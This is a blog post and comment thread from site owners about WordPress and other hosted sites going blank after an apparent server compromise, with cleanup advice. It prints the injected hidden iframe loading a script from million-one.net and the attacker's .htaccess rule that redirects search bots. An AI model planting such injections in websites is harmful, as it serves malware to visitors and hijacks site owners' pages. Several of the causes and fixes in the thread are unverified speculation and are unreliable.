Did you go to your WordPress blog and find a blank page instead? I had the same thing happen to me today and I was horrified!
What do you do when you get a blank page on WordPress?
Firstly I check that I could log in to the WordPress backend. I could and I looked around but couldn’t find anything wrong there.
Next, I logged onto the root of my domain but I couldn’t see anything suspicious there either.
Then I searched Google. Some of the results suggested updating to the latest version of WordPress (mine already was) and that I disable all the plugins as this was the most likely culprit.
I renamed the plugin directory and refreshed the page. Still not working!
I had noticed before that there was two index files on the server so I downloaded them both; index.php and index.html. Also the .htaccess file.
The .htaccess file looked ok but when I opened the index.php and index.html files, I found a line of code that was identical in both that looked very suspicious. It was the following:
<iframe name=”StatPage” src=”http://million-one.net/script.php” width=5 height=5 style=”display:none”></iframe><iframe name=”StatPage” src=”http://million-one.net/script.php” width=5 height=5 style=”display:none”></iframe>
I was not familiar at all with the domain in the code. I deleted the above code from the index.php file.
The index.html file contained only the above code and nothing else so I deleted the index.html file altogether.
After making those changes I was able to see my WordPress blog again. Oh, the joy!
I don’t think that WordPress creates an index.html file at all, so if you ever see one on your site, check it out and delete it.
Have you found another reason why you got a blank page on WordPress? Let us know by posting a comment below.
You just saved me a lot of time and stress. Thanks so much! Have you been able to find the cause of this?
Glad to hear that it helped!
No, I don’t know how it happened but it did affect all my domains. I assume that because I had the same password for all my domains that once it cracked one password it was able to infect all of them.
I’ve changed my password so I don’t think it will happen again… for a while at least!
Hi Stocks,
Which webpage are you referring to? I went to your site but it is up and running okay.
After writing this post, my blog was affected again. After deleting the rogue index.html and index.php files, I changed the domain password on my webhost. Since then I haven’t had the same problem.
I think this issue is caused by a hack. Changing your domain’s web host password on a regular basis helps to avoid these kind of things happening.
Just had a client run into this issue. I dumped the index.html file, and bingo it works.
The client talked to the host and here was their response.
A possible security hole in WP 2.8.5? Or a plugin?
.-= Poker Magazine´s last blog ..Calculatem.com Reneges on Advertising Deal with PokerPlasm =-.
Hey, you did not solve the issue yet. This is temporary solution.
Check this page’s source code – View Source.
At the very bottom of the codes, the code below still exist.
I’m still finding a solution. It’s a WordPress bug eh?
This was very timely information thanks for sharing!
This happened to every blog on my hosting account. I deleted the html file and it fixed the problem, if it comes back I will take the extra step of changing password.
Thanks!
I’m at a loss here. My domain has the same URL when you look at the source code but when I go to my http://FTP…and look at the index.php, that iframe codes is nowhere to be found.
Also, I don’t have an index.html file anywhere there.
Weird.
oops…don’t know how the ftp link got in my last comment.
Just for the record, these were two responses earlier today from Kiosk support, received before the latest attack
“We apologize the inconvenience caused to you. The sites should be up soon. We have found the source of the attack and blocked it. More security features are added to the servers to prevent this happening again. Please feel free to re open this ticket if you need any further assistance.”
and this one after that –
“We are aware of these issues and we are upgrading server security, it is a time consuming process but we assure you that everything will be fixed/secured considering the recent attacks.”
Whatever they upgraded, didn’t work that’s for sure
I had the same issue yesterday. But in addition to my two blogs every single site that I had on my server was infected. It seems that once the hacker got access via the wp blog they were able to infect the index files of every domain and sub domain on the server.
So if you are on a shared server that was infected you need to check all of your sites.
I spent many hours fixing the problem yesterday. I had to manually go thru every single domain and subdomain I own. What a pain.
I woke up today and checked my sites and they were ALl re-infected once again.
Only took me 4 hours to manually fix them all again.
Hopefully todays new wordpress update will stop this insanity.
So if you are running wordpress make sure that you update your blog right now with wordpresses new update that they announced today.
Otherwise you will get re-infected.
And if you are on a shared server… better pray that everyone who is on your server updates their blog.
.-= The HBB Advisor´s last blog ..Postcard Profits – Can You REALLY Make Good Money With Postcard Marketing? =-.
I also forgot to mention that my virus protection said that the script that the iframe was sending us to was a virus.
.-= The HBB Advisor´s last blog ..Postcard Profits – Can You REALLY Make Good Money With Postcard Marketing? =-.
I had same problems on my blogs.
The darn file would come back every day after erasing it. So today I put this blocking acces code in my htaccess. It will block the site and give this bastard an error code (403).
You can just copy and paste it as is if you want, I already put his friggin url in it.
RewriteEngine on
# Options +FollowSymlinks
RewriteCond %{HTTP_REFERER} million-one.net\.com [NC]
RewriteRule .* – [F]
Paul
It seems rather strange that this issue only seems to be affecting Kiosk/GVO hosting.
I had this issue with all my domains hosted on Kiosk yesterday and just again today. The strange thing is that it is affecting all domains (I have 17 on Kiosk) whether they are WordPress or not.
I am convinced that the problem does not lie with WordPress at all but rather a gaping security hole with Kiosk allowing access to WHM.
After yesterdays attack, I changed all my passwords for WHM and cpanel FTP, SQL etc. However, still these hackers are able to get in. The reason being that if you log in to your WHM through the Kiosk site members login route, you can only do so using the original password that you had when you signed up. Once logged in, you have free access to all cpanels on your hosting account – no passwords required!
I have already pointed this out to Kiosk support but it seems that Joel is being told that WordPress is to blame! If that were the case, how come normal html (xsitepro) sites are also being attacked as well.
ahhh, nevermind. There WAS an index.html file in there. I guess I didn’t see it. Once I deleted it. My blog was visible again.
Pingback: uberVU
I notice that some folks here are just deleting the rogue index.html file. However, you also need to go into index.php and delete the iframe section there as well. index.html is not used on WordPress but index.php is. If the site is html, then the opposite applies.
That million-one.net domain is probably just a zombie site that carries the malware or virus or whatever the end game is. I doubt if they are the actual hackers who are doing the attacking.
@HBB Advisor
I am more convinced than ever that this issue is down to Kiosk and not WordPress. I have two domains that are just sitting on Kiosk servers but are not actually used for anything. The only way they could be found is by looking at the listing in my Webhost Manager. However, they are being hit with this iframe.
On the other hand, a couple of my domains have several seperate wordpress installs in sub directories under the main domain and yet they are not being touched – why – because they are not listed in WHM.
I have just written to Joel and Kiosk support yet again but whether they will do anything about it is anybodies guess. Either Joel is being misinformed or they are trying to cover up the real problem by blaming WordPress.
As far as I see it, there is a gaping security hole that is allowing easy access to WHM and domain cpanels. I experienced a similar issue back in September but all that did was throw up errors on the bottom of WordPress sites. That one though was injecting a line of code into index.php like get_cyclik_links_rand()
I must be a gluten for punishment as well considering the hassle I have had with Kiosk hosting more or less since the day I signed up. Time to look around for another host me thinks!
I have been battling this pain in the neck for the past 2 weeks. I tried permissions, deletiong, .htaccess modifications etc all to no avail.
The boyz at kiosk/gvo have actually been SUPER RESPONSIVE! I’ve been with various hosts since 1995 and NONE have been so responsive.
Now, if it is not a wordpress problem, then why would wordpress put out a new upgrade TODAY? I believe it is a combination wordpress AND kiosk problem.
So I upgraded all of my blogs except for 2 to 2.8.6. Why not the other 2? Well, right now, trying to get into fantistico is problematic and has been for the past 4 hours or so.
It appears they are still trying to clean up the mess. YAYYY!! and Here is what we get:
“Parse error: syntax error, unexpected ‘;’ in /tmp/cpanel_phpengine.1258165436.252786b4v62QmRG on line 116” which means cpanel has to be reinstalled, or fantastico has to be reinstalled but what i am finding when trying to upgrade wordpress manually is that they have put a lockdown on security by shutting down access to shell.
Whatever… I hope they get us hooked up soon. million-one.net and the porn thingy at tradbox.net is getting on my last nerve. Well i use firefox with noscript so they don’t run on my computer but my visitors are getting hit big time.
Guess what, folks?! This too shall pass and hope the boys learn a lesson and shut down some of the holes in their security.\
I had these guys run a report on a coupla of my domains on a shared server and here is what is reported. I haven’t analyzed it but I believe the kiosk boyz are on it!
God Bless
Faith Sloan
http://www.faithsloan.com
@Faith Sloan
The wordpress security upgrade is not specific to Kiosk despite the claims being made in a certain video/email. However, the issue is only affecting folks hosted on Kiosk.
I would hazard a guess that somebody has got hold of a list of Kiosk member passwords and using them to autologin to WHM/Cpanels.
We need a way to change member login names and passwords but there is no means of doing that, or at least not that I can see.
My client is on http://www.wwkiosk.com/, has had his 5 blogs affected. Dump the index.html and clean out the index.php, that is what they told us and I did. Now, I have my own server, with 25-30 accts on it, no problems. Its wwkiosk for sure.
.-= Poker Magazine´s last blog ..Calculatem.com Reneges on Advertising Deal with PokerPlasm =-.
Tell me about it, I had 50 xsitepros sites and 21 blogs to clean up on kiosk every day for this last week.
Last year I had my lesson when all my sites were down and Google dropped my rankings. Now I have a bunch of sites on other servers so its only a part of my business that suffered this week with kiosk… Spread the love.
@Alan K I have the exact same concerns. Every one of my sites were affected. Not just my two WP blogs. And like you every one of them are hosted with Kiosk/GVO. In fact this is the second time this year that they have had a major hacking issue. The last one cost me a bunch of google page one results that I had to rebuild.
I just spoke with someone I know that haves a WP blog with another hosting company and has not had any problems. And her blog is an older install that has not been updated.
Problem is Kiosk/GVO will never admit that it is their fault.
@Faith
I already changed the WHM and Cpanel passwords after the first attack but doing so did not prevent another attack yesterday evening. The only password which I did not and could not change was the member login password.
Having said that, I have found a way to change that password although not the user name.
Login into your member area as usual, go to “account manager” and then “edit your profile”. There is an option in there that allows a password change. You can only use letters or numbers but at least you can change it.
also guys, this is not specific to kiosk/gvo. i experienced this back in year 2000 through 2009 with different hosts. it is not difficult to do this little injection. but yes, kiosk/gvo can take steps to prevent it but we must be cognizant and do the same.
now ask yourself this. Why did wordpress come out with 2.8.6 upgrade today when kiosk/gvo lock elbows with them, collaborated and came up with a solution? this is unheard of in the industry! wordpress stepped up to the plate and got ‘er done. but kiosk/gvo need to do the do and get ‘er done on their end. my previous post showed their vulnerabilities.
Why shucks! I’ve been using kiosk since forever and my email address at frsa.com has been spoofed galore! i receive thousands of undeliverable email messages every day. I never use that domain for email. besides it is blacklisted because they allow the invalid sender to send out email as if it is coming from my domain. it ain’t a difficult fix. but still after all of these years my lovely frsa.com domain is basically burnt toast.
God Bless
Faith Sloan
God Bless
Faith
The issue is NOT just affecting kiosk customers. I repeat. This is NOT just affecting kiosk customers today nor yesterday.
God Bless
Faith
http://www.faithsloan.com
Oh, yeah. When you log into your WHM , you click on list accounts.
Then all of your domain accounts (users) are listed.
Click on the ‘+’ sign on the left of the domain name.
You will see a place to change the password and contact email for each domain
God Bless
Faith Sloan
If you haven’t seen Joel’s (founder of GVO) video explaining the nature of these attacks, please watch it here: http://storage.joeltherien.com/wordpress/
@Paul
Exactly the same here – Every domain and sub domain listed on the WHM is being hit whether it is in use or not, xsitepro or WP. One strange thing is that whatever/whoever is doing it does not seem to work on weekends. Saturday and Sunday no problems but then got hit last night and tonight (UK time) and both at the same time – 15.38 Texas time.
One of my domains has several separate wordpress installs in sub directories and none of them are getting touched – only the root domain.
Well I disagree with them.
My regular websites were attacked as well, so its not a blog only related problem. And I did update one blog to the latest version to see and it got attacked the same as my older version today nov17 2009. sooooo…
Yeah, this is getting too old. Every day I have to clean hosted files for multiple domains. It ain’t difficult but i’d rather be whistling dixie.
I have to quickly squash this problem or Google will penalize me; folks won’t come back to my sites, etc.
And no. It is not a wordpress ONLY problem. It was caused by a breach. Now that the breach hole is still open and obviously is timed execute every morning at the exact same time, why the heck can’t we kill this bugger?
It MAY have started with a WordPress breach but the problem goes past that. Kiosk, needs to fix this thing for good so this ‘problem’ won’t continue to affect them/us.
It looks like the cron job looks for index.php. if you got index.php, then they put that nasty million-one.net iframe at the bottom. if you do not have index.html, it creates one with that nasty iframe it it.
2 weeks ago i found that my .htaccess file at the root level was compromised. they changed this:
RewriteEngine On
RewriteCond %{HTTP_HOST} !^www\. [NC]
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]
to this:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^.*(bot|urp|msn).* [NC]
RewriteRule ^(.*) 2.html [NS,NC,L]
Jerks!
LOL!
God Bless
Faith
Yes, only the root directory.
Funny but not really …
As soon as I finished with my above post, my domains were hosed again. So now it is happening early morning around 9am CST or so and now about 5:30pm CST or so.
Took me 5 minutes to fix the whole package deal. Got those cleanup scripts running. What I probably do is simply run the scripts every 15 minutes. Whateverrrr…
Maybe the clown has a job. He is not allowed out of his hole on the weekends or after 5:30pm CST. Maybe he hasn’t learn how to schedule cron jobs.
God Help Him/Her.
God Bless
Faith
From what I understand, this issue is due to a vulnerability in WordPress. Even so, if your WordPress blog is hosted on a shared server, it will affect all the other domains on the shared server.
To resolve the issue you need to update all your WordPress blogs to the latest version (which at the time of writing is 2.8.6).
wow – nobody can see they were hacked?
That’s right Fred. Unless you know where to look, you wouldn’t think you were hacked if a blank page came up on your WordPress blog. Your first reaction might be that there was an issue with your web hosting or WordPress itself.
Blogging is one popular thing among Internet users. I am a blogger and I have maintained different blogsites. I have a WordPress blog and I have also experienced the same. I think this is because of incompatible plugins, the theme files are not uploaded or incomplete upload of WordPress files.
Thanks for the advice!
You’re welcome Donald!
Great info, thanks